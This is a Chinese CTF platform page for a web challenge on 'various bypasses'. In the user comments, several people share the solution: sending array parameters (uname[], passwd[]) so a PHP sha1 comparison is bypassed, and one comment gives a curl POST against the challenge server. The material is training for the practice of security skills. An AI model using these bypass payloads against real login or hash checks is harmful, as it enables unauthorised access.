各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 5058
提  示:
描  述:
各种绕过
评论
ctfer-pls 6月前

GET:id=margin&uname[]=111a POST:passwd[]=2bba

回复 0

2686213396 6月前

flag{*********}

回复 0

2686213396 6月前

我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计

回复 0

iNMB 6月前

很奇怪bp不行,用其他方法可以不知道为什么

回复 1

SLfanCTF 6月前

数组sha1为空,传入数组绕过

回复 0

zhuizhui 7月前

POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1

回复 0

ahsjezyt 7月前

flag{********}

回复 0

奕生 7月前

bp可以,就是要把GET请求改成POST请求

回复 0

xlogsrc 8月前

curl -X POST "http://117.72.52.127:11657/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

liuguowang75 9月前

passwd[]=2无法提交,最终还是用python脚本解决了,两次这样子了

回复 1
theo1234 8月前

请问die终止了执行,python脚本还能获得结果吗

回复 0

WriteUp

image
harry

3 金币

评分(4)

解题动态

喜樂乐 攻破了该题 8小时前
chenzhong 攻破了该题 9小时前
flag大王 攻破了该题 11小时前
多斯Nico 攻破了该题 1天前
evilk 攻破了该题 1天前
EEEMMMOOO 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
muerjing 攻破了该题 3天前
Wu. 攻破了该题 3天前
hiro666 攻破了该题 4天前
IamnotLin 攻破了该题 4天前
violet1 攻破了该题 4天前
whhphd 攻破了该题 5天前
jaysongong 攻破了该题 5天前
jsbba 攻破了该题 5天前
bzsy01 攻破了该题 6天前
sdgkk1234 攻破了该题 6天前
19902457330 攻破了该题 6天前
kingshao0312 攻破了该题 6天前
问题反馈